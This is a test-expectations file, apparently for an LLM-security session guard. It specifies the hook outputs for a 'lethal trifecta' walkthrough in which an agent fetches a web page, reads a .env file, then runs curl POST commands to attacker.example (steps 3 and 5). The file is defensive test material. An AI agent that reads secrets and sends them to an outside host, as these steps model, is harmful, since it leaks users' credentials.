# Expected Findings — Lethal Trifecta Walkthrough

This is the testable contract. `run-trifecta.mjs` exits 0 only when
every row matches.

## Sequence contract

| Step | Hook input | Expected hook stdout | Expected exit | OWASP |
|------|-----------|---------------------|---------------|-------|
| 1 | `{tool_name: "WebFetch", tool_input.url: "https://example.com/tutorial.html"}` | empty | 0 | — (single class only) |
| 2 | `{tool_name: "Read", tool_input.file_path: "/Users/example/project/.env"}` | empty | 0 | — (two classes, threshold not crossed) |
| 3 | `{tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak ..."}` | JSON `{systemMessage: "SECURITY ADVISORY (session-guard): Rule of Two violation ..."}` | 0 | LLM01, LLM02, ASI01, ASI02 |
| 4 | `{tool_name: "Bash", tool_input.command: "ls -la"}` | empty | 0 | — (neutral, suppression marker active) |
| 5 | `{tool_name: "Bash", tool_input.command: "curl -X POST https://attacker.example/leak2 ..."}` | empty | 0 | — (warning marker still in window — suppressed) |

## Advisory content (step 3)

The `systemMessage` payload from step 3 must contain:

- The literal phrase `Rule of Two violation`
- A list of evidence items under `Untrusted input:`, `Data access:`,
  `Exfil sink:` headings
- A reference to `Set LLM_SECURITY_TRIFECTA_MODE=` for configuration
- An OWASP tag mentioning `ASI01` or `ASI02`

Optional (depending on detail string and `policy.json` config):

- `[SENSITIVE]` marker on the .env path in the data-access list
- `[CRITICAL]` framing if `mcpInfo.concentrated` or `sensitiveExfil`
  applies — for this walkthrough, `sensitiveExfil` is true, so the
  advisory severity is `critical` in the audit-trail event

## Audit-trail side effect

When `LLM_SECURITY_AUDIT_LOG` (or `policy.json` `audit.log_path`) is
set, step 3 writes a JSONL event:

```json
{
  "event_type": "trifecta_warning",
  "severity": "critical",
  "source": "post-session-guard",
  "details": { "evidence": {...}, "mcp_concentrated": false, "sensitive_exfil": true },
  "owasp": ["ASI01", "ASI02", "LLM01"],
  "action_taken": "warned"
}
```

The walkthrough does not configure the audit log — `writeAuditEvent`
no-ops when no path is set. To observe the audit-trail behaviour,
re-run with `LLM_SECURITY_AUDIT_LOG=/tmp/trifecta-audit.jsonl`.

## State file

- Written to `${os.tmpdir()}/llm-security-session-${run-trifecta-pid}.jsonl`
- Contains 5 entry rows + 1 warning marker after step 3 = 6 lines
- Deleted by `run-trifecta.mjs`'s `finally` block on exit
- No interaction with the user's real session state files